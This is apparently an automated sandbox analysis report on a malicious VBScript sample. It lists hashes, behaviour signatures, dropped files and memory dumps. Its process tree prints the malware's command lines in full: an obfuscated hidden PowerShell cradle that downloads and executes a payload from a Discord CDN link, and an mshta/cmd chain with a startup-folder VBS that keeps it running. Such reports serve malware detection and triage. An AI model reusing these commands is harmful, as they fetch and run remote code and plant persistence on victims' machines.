Analysis
- max time kernel: 17s
- max time network: 154s
- platform: windows7_x64
- resource: win7v20210408
- submitted: 15-09-2021 08:29
Static task: static1
Behavioral task: behavioral1
Sample: e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed.vbs
Resource: win7v20210408
General
- Target: e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed.vbs
- Size: 828B
- MD5: 9af0d5fbc14e3ac0ae409dfef6e04228
- SHA1: 931b3139830e5485f198bb72ecba50475e4c8df2
- SHA256: e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed
- SHA512: fdca50df12edb4d7784a3c769908a695221456e8729b7ec61ec86b8328a18040c5aca7f2d6879f336b6c1a44b1323a8f1f05ff6dd14a4cbd9f233fedcd019f0e
Malware Config
Signatures
- Blocklisted process makes network request (1 IoC)
  Processes (flow | pid | process):
    7 | 2020 | powershell.exe
- Drops startup file (1 IoC)
  Processes (description | ioc | process):
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.vbs | powershell.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Modifies Internet Explorer settings
  Processes (description | ioc | process):
    Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes (pid | process):
    2020 | powershell.exe
    2020 | powershell.exe
    1252 | powershell.exe
    1252 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes (description | pid | process):
    Token: SeDebugPrivilege | 2020 | powershell.exe
    Token: SeDebugPrivilege | 1252 | powershell.exe
- Suspicious use of WriteProcessMemory (15 IoCs)
  Processes (description | pid | process | target process):
    PID 1100 wrote to memory of 2020 | 1100 | WScript.exe | powershell.exe
    PID 1100 wrote to memory of 2020 | 1100 | WScript.exe | powershell.exe
    PID 1100 wrote to memory of 2020 | 1100 | WScript.exe | powershell.exe
    PID 2020 wrote to memory of 696 | 2020 | powershell.exe | WScript.exe
    PID 2020 wrote to memory of 696 | 2020 | powershell.exe | WScript.exe
    PID 2020 wrote to memory of 696 | 2020 | powershell.exe | WScript.exe
    PID 696 wrote to memory of 324 | 696 | WScript.exe | cmd.exe
    PID 696 wrote to memory of 324 | 696 | WScript.exe | cmd.exe
    PID 696 wrote to memory of 324 | 696 | WScript.exe | cmd.exe
    PID 324 wrote to memory of 1456 | 324 | cmd.exe | mshta.exe
    PID 324 wrote to memory of 1456 | 324 | cmd.exe | mshta.exe
    PID 324 wrote to memory of 1456 | 324 | cmd.exe | mshta.exe
    PID 1456 wrote to memory of 1252 | 1456 | mshta.exe | powershell.exe
    PID 1456 wrote to memory of 1252 | 1456 | mshta.exe | powershell.exe
    PID 1456 wrote to memory of 1252 | 1456 | mshta.exe | powershell.exe
Processes
Process tree (each entry is a child of the one above it; the number is its depth):

1. C:\Windows\System32\WScript.exe
   Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed.vbs"
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://cdn.discordapp.com/attachments/876945743724822550/877222584595402823/Fucking.txt');$results
      - Blocklisted process makes network request
      - Drops startup file
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\System32\WScript.exe
         Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS"
         - Suspicious use of WriteProcessMemory

         4. C:\Windows\System32\cmd.exe
            Command line: cmd /c ""C:\Users\Admin\AppData\Roaming\SystemLogin.bat" "
            - Suspicious use of WriteProcessMemory

            5. C:\Windows\system32\mshta.exe
               Command line: mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'"", 0:close")
               - Modifies Internet Explorer settings
               - Suspicious use of WriteProcessMemory

               6. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
  MD5: 715a8616bed900968c1073f51a046daa
  SHA1: 995665c72cfa9c88d8edab3e6212b17ac479aab8
  SHA256: 0d433c2cd57ed977bf3681c0b0eb87acf21a237647eee1afd741c008fe22740e
  SHA512: 8c99f8ba6b03e4bca03116132dd93bea84e8fd0e49a0f7b67d46533e0e735a0c3301bde4c18e6e45659e8fa3f68fcf12c78017d9740c5220d76bfe4b2908a8a1
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: 614da39dd1b9bc0cad2bf9331f98340c
  SHA1: 72dd5336860a1a3e500f779f78a935d84970c14d
  SHA256: 266e4fb9d33676d994247bd0136bf588f7811cf2c325fa82fddbd77a6d8c7663
  SHA512: e846c6a133551925df78c7029a9051f390736acc13ce75a7ab64e91e4283f785aa057af8427b1b0f01320685647bb3021d1bdc09ea6baa8d6d7bbb2a2c86196c
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS
  MD5: 558a8b7b3fdef4ca79110f8cfd126694
  SHA1: d6e96ca27f701b3f4c24885dacd14c762a9d36b0
  SHA256: 38c9b7098371b39e61a6dcf78370dddf47f4d2be2c32704a2a0310b76c52c0f7
  SHA512: 37d6d72d5f518aaf1cf37154ed75aec7c7f11677508874eb3c3cbf44ca0ebeb22112dfa5f45a2f5d821604c521092ef768016d83f948444a9ff2e2a812d1c283
- C:\Users\Admin\AppData\Roaming\SystemLogin.bat
  MD5: 7f85382953fde20b101039d48673dbd2
  SHA1: 5ebaa67f5862b2925d9029f4761b7e2ce9a99dd9
  SHA256: fde417ad1b13a97acfa8e409789a92c4c3ddf6303851337ca31b94bfac634e4f
  SHA512: 6e93b74237844e1f78cd3ae64c0a00702c0b1aa1febda2feb52ca99b8a58ab2efd0c7b8351f040bf56a8bc1a8f5b1f57c4a9ffed46f8a2f9cba898e8e138ce46
- C:\Users\Public\myScript.ps1
  MD5: 317f5c7ef5b887966f963c21a60e2889
  SHA1: 5078bdb3e7376202c7253a8b428a360e1c047863
  SHA256: cd7143c00ef7711ccdcc6877d6d393e4f6e2bb2aef26bf2214b81e660f7c7cdd
  SHA512: e4d6590082671997ef08550d48b5ff43dd63a1811c4b883bbe75a9a5e22087b5928be43e624632bdaf8c01d4334ae397c672d1695900d1bd25e7a27a03b10750

Memory dumps:
- memory/324-76-0x0000000000000000-mapping.dmp
- memory/696-72-0x0000000000000000-mapping.dmp
- memory/1100-60-0x000007FEFBAA1000-0x000007FEFBAA3000-memory.dmp (Filesize: 8KB)
- memory/1252-85-0x000000001AC34000-0x000000001AC36000-memory.dmp (Filesize: 8KB)
- memory/1252-78-0x0000000000000000-mapping.dmp
- memory/1252-84-0x000000001AC30000-0x000000001AC32000-memory.dmp (Filesize: 8KB)
- memory/1252-91-0x0000000002520000-0x0000000002522000-memory.dmp (Filesize: 8KB)
- memory/1456-77-0x0000000000000000-mapping.dmp
- memory/2020-66-0x0000000001E10000-0x0000000001E11000-memory.dmp (Filesize: 4KB)
- memory/2020-71-0x000000001B610000-0x000000001B611000-memory.dmp (Filesize: 4KB)
- memory/2020-70-0x0000000001FE0000-0x0000000001FE2000-memory.dmp (Filesize: 8KB)
- memory/2020-69-0x000000001B9E0000-0x000000001B9E1000-memory.dmp (Filesize: 4KB)
- memory/2020-68-0x0000000002974000-0x0000000002976000-memory.dmp (Filesize: 8KB)
- memory/2020-67-0x0000000001E40000-0x0000000001E41000-memory.dmp (Filesize: 4KB)
- memory/2020-61-0x0000000000000000-mapping.dmp
- memory/2020-63-0x0000000002970000-0x0000000002972000-memory.dmp (Filesize: 8KB)
- memory/2020-65-0x000000001AD60000-0x000000001AD61000-memory.dmp (Filesize: 4KB)
- memory/2020-64-0x0000000001CA0000-0x0000000001CA1000-memory.dmp (Filesize: 4KB)